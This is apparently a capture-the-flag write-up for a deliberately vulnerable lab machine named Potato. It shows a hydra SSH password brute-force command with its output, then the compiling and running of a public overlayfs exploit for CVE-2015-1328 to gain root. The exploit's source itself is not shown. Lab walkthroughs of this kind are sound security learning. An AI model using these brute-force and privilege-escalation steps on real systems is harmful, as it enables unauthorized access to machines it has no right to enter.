Difficulty: Easy to Medium
Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox)
Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).

This is another box from the same people who made Chili and Cherry, but it’s rated easy to medium rather than just easy, so presumably it’s a little more challenging.


This time we get just two ports, 80 and 7120. 80 is HTTP, and 7120 is running SSH.

Enumerating the webserver doesn’t turn up anything except /info.php which displays phpinfo. By itself; not useful.


Welp, let’s bruteforce SSH then lol:

root@kali:/opt/vulnhub/potato# hydra -s 7120 -l potato -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2020-09-16 10:58:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 9999 login tries (l:1/p:9999), ~625 tries per task
[DATA] attacking ssh://
[STATUS] 177.00 tries/min, 177 tries in 00:01h, 9823 to do in 00:56h, 16 active
[7120][ssh] host:   login: potato   password: letmein
1 of 1 target successfully completed, 1 valid password found

That was pretty easy, so presumably it’s what we were supposed to do.


Once we SSH in as potato we run linpeas as usual; we are on an older Ubuntu build here and it highlights our kernel (3.13.0) as vulnerable. Googling around we find this, an exploit for CVE-2015-1328, a Local Privilege Escalation vulnerability in ‘overlayfs’. I wonder if it works?

potato@ubuntu:/dev/shm$ nano ofs.c -> code pasted here
potato@ubuntu:/dev/shm$ gcc ofs.c 
potato@ubuntu:/dev/shm$ ./a.out 
spawning threads
mount #1
mount #2
child threads done
/etc/ created
creating shared library
# whoami
# cd /root
# find proof.txt
# cat proof.txt

Well, that’s a yes it does. Still falls in the easy category for mine. The next one will probably kick my butt.